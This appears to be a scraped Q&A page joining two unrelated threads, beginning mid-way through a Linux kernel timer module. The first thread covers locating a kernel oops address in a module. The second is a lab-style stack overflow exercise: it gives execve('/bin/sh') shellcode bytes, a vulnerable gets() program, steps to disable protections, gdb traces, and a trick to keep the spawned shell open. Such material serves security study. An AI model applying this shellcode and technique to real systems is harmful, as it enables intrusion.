	class_destroy(cl);
err_cdev:
	cdev_del(&cdev);
err_region:
	unregister_chrdev_region(dev, MINOR_CNT);
	return err;
}
#endif
/*
 * Module exit: cancel the timer, log which way hrtimer_cancel() answered,
 * then remove the device node, class, cdev and device number region.
 */
static void clean_hrtimer(void)
{
	if (hrtimer_cancel(&timer))
		printk(KERN_ERR "Timer still running\n");
	else
		printk(KERN_ERR "Timer cancelled\n");

	/* Tear down in the reverse order of registration. */
	device_destroy(cl, dev);
	class_destroy(cl);
	cdev_del(&cdev);
	unregister_chrdev_region(dev, MINOR_CNT);
}
module_init(init_hrtimer);
module_exit(clean_hrtimer);
MODULE_LICENSE("GPL");
========================
I use the above code as a driver module and insert it with insmod. I expect this to fire every 1 ms and it works fine, but once in a while, when ethernet traffic is too high, it gives a kernel Oops as explained. Please check whether the code has any issues in it.
I checked the lsmod, and i see that all the 5 kernel modules (my own) are loaded between: 0x7f000000 to 0x7f02xxxx
mod at 0x7f020xxxx,
timermod at 0x7f01xxx,
mod2 at 0x7f01xxxx,
mod3 at 0x7f00xxxx,
mod4 at 0x7f000000.
There is no module loaded at oops address 0x7eb52754. I checked from /proc/kallsyms file to
verify this. How to check the mapping of 0x7eb5xxxx in to the source file? Where else can i get the data for this on system.
According to the error message, the code that caused this kernel panic resides at virtual address 0x7eb52754. Judging from the address (just below 0x80000000), I'm guessing this is the code segment of a kernel module - probably one of your own kernel modules.
To do a root cause analyses, load your (and all other) kernel modules in the same order as they were loaded when this panic occurred and observe their load address as printed by lsmod (or cat /proc/modules which is almost the same).
Using their code size and load address, calculate which module's text segment contains virtual address 0x7eb52754. Then subtract the module load address from 0x7eb52754.
What you will get is the offset into the module binary of the instruction that caused the panic.
Now use objdump on the kernel module binary and look for that offset, and check which function it belongs to (this can also be done with addr2line, if you have that too). This should point you to the function and even the line number (if you have debug information) of the instruction that caused this panic.
good luck.
I'm trying to overflow buffer with my shellcode and I have a problems with gets().
If I overflow the buffer with shellcode using the strcpy() function, it's OK and I get a /bin/bash. But if I do the same with the gets() function, it shows me nothing. I tried a ret2text attack with gets() and it works fine, but if I try to overflow with malicious code (a shell) it doesn't work.
I turned off stack-protector (-fno-stack-protector), disabled ASLR (echo 0 > randomize_va_space), enabled stack execution (-z execstack)
here is shellcode
\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
here is vuln prog
#include <stdio.h>
#include <string.h>
/*
 * Prompt for a name on stdout, read it from stdin and compare it with
 * "Peter".
 *
 * Returns 1 when the input equals "Peter", 0 otherwise.
 *
 * NOTE: this is the deliberately vulnerable function under discussion.
 * gets() takes no size argument, so any input longer than the 10-byte
 * `name` array writes past it on the stack.
 */
int ask_user(void)
{
int ret;
char name[10];
printf("Your Name: ");
/* Flush so the prompt appears before blocking on input. */
fflush(stdout);
gets(name);
ret = strcmp(name, "Peter");
if (ret == 0)
return 1;
return 0;
}
/*
 * Print a banner, ask for the user's name via ask_user() and report
 * whether it matched. Always exits with status 0.
 */
int main(int argc, char *argv[])
{
	printf("This Application finds the Peter!\n");

	if (ask_user() == 1)
		printf("Lol, you are a real Peter!\n");
	else
		printf("Ups, no Peter :-/\n");

	return 0;
}
some gdb
gdb$ si
--------------------------------------------------------------------------[regs]
EAX: 0x0000000B EBX: 0xBFFFEF22 ECX: 0x00000000 EDX: 0x00000000 o d I t s Z a P c
ESI: 0x00000000 EDI: 0x00000000 EBP: 0x41414141 ESP: 0xBFFFEF10 EIP: 0xBFFFEF1B
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
=> 0xbfffef1b: int 0x80
0xbfffef1d: call 0xbfffef12
0xbfffef22: das
0xbfffef23: bound ebp,QWORD PTR [ecx+0x6e]
0xbfffef26: das
0xbfffef27: jae 0xbfffef91
0xbfffef29: add BYTE PTR [eax+ecx*1],al
0xbfffef2c: add BYTE PTR [eax],al
--------------------------------------------------------------------------------
0xbfffef1b in ?? ()
gdb$ x/1sb $ebx
0xbfffef22: "/bin/sh"
gdb$ x/1sb $esp
0xbfffef10: "ë\v[1À1É1Ò°\vÍ\200èð\377\377\377/bin/sh"
gdb$ si
process 3697 is executing new program: /bin/bash
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?
[Inferior 1 (process 3697) exited normally]
--------------------------------------------------------------------------[regs]
EAX:Error while running hook_stop:
No registers.
As you can see in the debugger, the shell starts and then exits immediately. When I used strcpy, the shell started and did not exit.
There is a difference of behaviour between strcpy and gets.
You should try using something like this in order to keep stdin open:
(cat /tmp/yourbuffer;cat) | ./vuln